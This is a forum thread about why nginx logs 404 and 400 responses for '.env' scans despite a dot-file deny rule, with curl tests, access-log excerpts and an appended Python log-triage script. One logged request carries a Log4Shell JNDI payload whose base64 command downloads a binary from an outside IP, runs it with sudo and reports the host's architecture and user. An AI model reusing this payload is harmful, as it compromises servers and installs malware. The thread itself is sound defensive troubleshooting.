I recall scans for .env were blocked via Laravel Forge setup server but on new ploi.io setup server with
location ~ /\.(?!well-known).* {
deny all;
}
as before I still saw this in access logs:
34.100.212.100 - - [08/Apr/2023:00:48:14 +0000] "GET /.env HTTP/1.1" 404 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
should that rule in Nginx not just block this?
it returned 404.
Unfortunately you can't stop people trying to access it
@Snapey Yeah, the .env is below the public directory so cannot be reached with ease as we use PHP Deployer with a setup with home/user/site.com/public/current a symlink for loading release data and necessary files like .env in /home/user/site.com/shared
Also, what is odd is that when I load https://staging.site.com/.env in the browser Nginx does load a 403 forbidden Nginx error. So there Nginx does seem to block access to it. So why a 404 in the access log for GET /.env? Perhaps because it became a request to our API? I think so.
@rhand I guess it depends if it gets routed through index.php?
what do you get with curl of site.com/.env ?
curl -I https://site.com/.env
HTTP/2 403
server: nginx
date: Sun, 09 Apr 2023 07:22:16 GMT
content-type: text/html; charset=utf-8
content-length: 146
strict-transport-security: max-age=31536000; includeSubDomains
or
curl -I -4 --http1.1 https://site.com/.env
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sun, 09 Apr 2023 07:27:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 146
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains
http goes to https
curl -I http://site.com/.env
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sun, 09 Apr 2023 07:28:17 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://site.com/.env
So perhaps the earlier request used an ip address or something.. that did not hit normal route and then got a 404. Really odd still.
latest check on .env request and I had
cat -n 100 /var/log/nginx/access.log |grep env
cat: 100: No such file or directory
3 95.214.55.244 - - [09/Apr/2023:00:34:31 +0200] "GET / HTTP/1.1" 404 146 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY3VybCAtTyBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY2htb2QgK3ggemxpYjQ1IDsgY2htb2QgNzc3IHpsaWI0NSA7IC4vemxpYjQ1IDIgOyBzdWRvIC4vemxpYjQ1IDIgOyBybSAtcmYgemxpYjQ1OyBjdXJsIGh0dHA6Ly8xMjkuMTUxLjY0LjU1L2FyY2gvJCh1bmFtZSAtbSkvdXNlci8kKHdob2FtaSk7IHN1ZG8gY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0pL3VzZXIvJCh3aG9hbWkp}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY3VybCAtTyBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY2htb2QgK3ggemxpYjQ1IDsgY2htb2QgNzc3IHpsaWI0NSA7IC4vemxpYjQ1IDIgOyBzdWRvIC4vemxpYjQ1IDIgOyBybSAtcmYgemxpYjQ1OyBjdXJsIGh0dHA6Ly8xMjkuMTUxLjY0LjU1L2FyY2gvJCh1bmFtZSAtbSkvdXNlci8kKHdob2FtaSk7IHN1ZG8gY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0pL3VzZXIvJCh3aG9hbWkp}')"
18 35.173.253.16 - - [09/Apr/2023:02:02:24 +0200] "GET /.env HTTP/1.1" 400 248 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
25 109.237.97.180 - - [09/Apr/2023:02:37:45 +0200] "GET /.env HTTP/1.1" 400 650 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
26 109.237.97.180 - - [09/Apr/2023:02:37:45 +0200] "GET /.env HTTP/1.1" 404 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
105 185.245.183.155 - - [09/Apr/2023:08:12:33 +0200] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
133 118.99.107.210 - - [09/Apr/2023:09:30:27 +0200] "HEAD /.env HTTP/1.1" 301 0 "-" "curl/7.87.0"
Mostly 400s but one 404 error on second request by same ip:
25 109.237.97.180 - - [09/Apr/2023:02:37:45 +0200] "GET /.env HTTP/1.1" 400 650 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
26 109.237.97.180 - - [09/Apr/2023:02:37:45 +0200] "GET /.env HTTP/1.1" 404 178 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
and from that IP address more abuse came: https://www.abuseipdb.com/check/109.237.97.180. But still not clear how they were able to trigger a 404. As shown earlier I only get 403s really:
curl -4 --http1.1 https://site.com/.env
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx</center>
</body>
</html>
or
curl -I -4 --http1.1 https://site.com/.env
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sun, 09 Apr 2023 08:07:11 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 146
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains
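An added example, not part of the original thread: a small log triage script that applies the thread's deny rule to each requested path (instead of `grep env`, which also matches unrelated lines containing `${env:`) and labels the status code of every request the rule should cover. The sample log lines, the verdict labels and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Deny rule quoted in the thread: location ~ /\.(?!well-known).*
# nginx regex locations are unanchored, so re.search mirrors the match.
DENY_RULE = re.compile(r"/\.(?!well-known).*")

# Leading fields of nginx's "combined" access log format.
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<uri>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample lines (documentation IP ranges), not taken from a real log.
SAMPLE_LOG = """\
192.0.2.10 - - [09/Apr/2023:02:37:45 +0200] "GET /.env HTTP/1.1" 400 650 "-" "scanner"
192.0.2.10 - - [09/Apr/2023:02:37:45 +0200] "GET /.env HTTP/1.1" 404 178 "-" "scanner"
198.51.100.7 - - [09/Apr/2023:08:12:33 +0200] "GET /.env HTTP/1.1" 301 162 "-" "scanner"
198.51.100.7 - - [09/Apr/2023:08:12:34 +0200] "GET /.env HTTP/1.1" 403 146 "-" "scanner"
203.0.113.5 - - [09/Apr/2023:09:00:00 +0200] "GET /.well-known/acme-challenge/abc HTTP/1.1" 200 87 "-" "acme"
203.0.113.9 - - [09/Apr/2023:09:10:00 +0200] "GET /%2eenv.bak?x=1 HTTP/1.1" 200 512 "-" "scanner"
203.0.113.9 - - [09/Apr/2023:09:12:00 +0200] "GET / HTTP/1.1" 404 146 "${env:X}" "scanner"
""".splitlines()

def classify(status):
    if status == 403:
        return "denied"         # what `deny all` produces
    if 200 <= status < 300:
        return "EXPOSED"        # content was served: investigate immediately
    if 300 <= status < 400:
        return "redirected"     # e.g. the http -> https 301 seen in the thread
    return "not-from-rule"      # 400/404: likely answered before or outside that location

def triage(lines):
    """Return (ip, path, status, verdict) for every request the deny rule should cover."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        # nginx matches locations on the percent-decoded path, without the query string.
        path = unquote(m["uri"].split("?", 1)[0])
        if DENY_RULE.search(path):
            status = int(m["status"])
            findings.append((m["ip"], path, status, classify(status)))
    return findings

if __name__ == "__main__":
    for row in triage(SAMPLE_LOG):
        print(*row)
```

Rows labelled `not-from-rule` are the ones to trace back to a server block, since a request handled by the deny location would have been logged as 403.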